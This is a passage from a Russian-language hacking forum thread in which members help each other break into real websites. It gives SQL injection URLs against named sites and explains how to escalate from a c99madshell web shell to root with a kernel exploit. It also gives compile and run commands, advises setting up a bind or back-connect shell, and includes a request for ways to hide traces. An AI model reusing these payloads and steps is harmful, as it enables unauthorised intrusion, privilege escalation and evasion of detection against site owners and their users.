 |
|
30.03.2008, 00:30
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами:
10516826
Репутация:
3742
|
|
дело совсем в другом, а именно в самих правах доступа drw-r--r- к примеру..
есть статья в нашизх статьях, ищи.
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
30.03.2008, 00:49
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Велемир, там надо лимитом пользоваться:
Код:
http://www.laptopshowcase.co.uk/suppliers.php?id=-1%20GROUP%20BY%20suppliers.id%20union%20select%201,2,name,4,5,6,7,8,9%20from%20suppliers%20limit%201,1/*
__________________
Карфаген должен быть разрушен...
|
|
|
|
30.03.2008, 01:34
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 25
С нами:
9734371
Репутация:
3
|
|
права доступа
Спасибо, blackybr! 
Подскажите, как можно и через что получить в Linux доступ к файлам root/adm, которые открыты только для этого пользователя и закрыты для группы, если есть c99madshell с правами uid=33(www-data) gid=33(www-data) groups=33(www-data) ?
Спасибо!
Последний раз редактировалось fervex; 30.03.2008 в 01:39..
|
|
|
|
30.03.2008, 01:43
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами:
10516826
Репутация:
3742
|
|
fervex поднять права, к примеру порутать серв. от рута ты сам сможешь права ставить любые
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
30.03.2008, 02:08
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 25
С нами:
9734371
Репутация:
3
|
|
порутать Linux сервер
Спасибо, blackybr!
а порутать серв можно с помощью сплойта или ещё как?
посоветуйте, что почитать можно по рутанью Linux сервера, если залит c99madshell?
|
|
|
|
30.03.2008, 02:21
|
|
Познающий
Регистрация: 26.03.2008
Сообщений: 31
С нами:
9541076
Репутация:
82
|
|
выполняешь uname -a , смотришь версию ядра и ищешь сплоиты под эту версию
|
|
|
|
30.03.2008, 02:28
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 25
С нами:
9734371
Репутация:
3
|
|
запуск exploit на Linux
Спасибо, Анжелик!
Linux webserver2 2.6.15-26-server #1 SMP Aug 2006 i686 GNU/Linux
Версию знаю, сплоит нашёл - http://www.milw0rm.com/exploits/2006
А если я его выполню в c99madshell через: gcc raptor_prctl.c -o raptor_prctl -Wall
./raptor_prctl
то какой будет результат в итоге? у меня у c99madshell'a появятся права root на эту сессию, или навсегда? или ещё что? не запалит ли это меня, и как замести следы?
Последний раз редактировалось fervex; 30.03.2008 в 02:31..
|
|
|
|
30.03.2008, 03:54
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Scipio, спасибо - уже большой плюс))))))).Осталось гадать )
|
|
|
|
30.03.2008, 13:15
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами:
10516826
Репутация:
3742
|
|
fervex тебе нужно забиндить порт или сбэкконектиться (желаетльно чтобы псевдотерминад поддердживался скриптом) и только потом запускать, так сказать интерактивно
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
30.03.2008, 15:10
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами:
9981026
Репутация:
728
|
|
Проблема в следующем, есть скуль, бд - mssql, на кавычку идет фильтр, пытаюсь вытянуть что-нибудь следующим запросом - http://www.xxx.com/number.asp?id=45509+or+1=(select+top+1+table_name+ from+information_schema.columns+where+column_name= char(112,97,115,115,119,111,114,100)--
В ответ ошибка - The char function requires 1 arguments.
Что не так, и как можно обойти ?
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
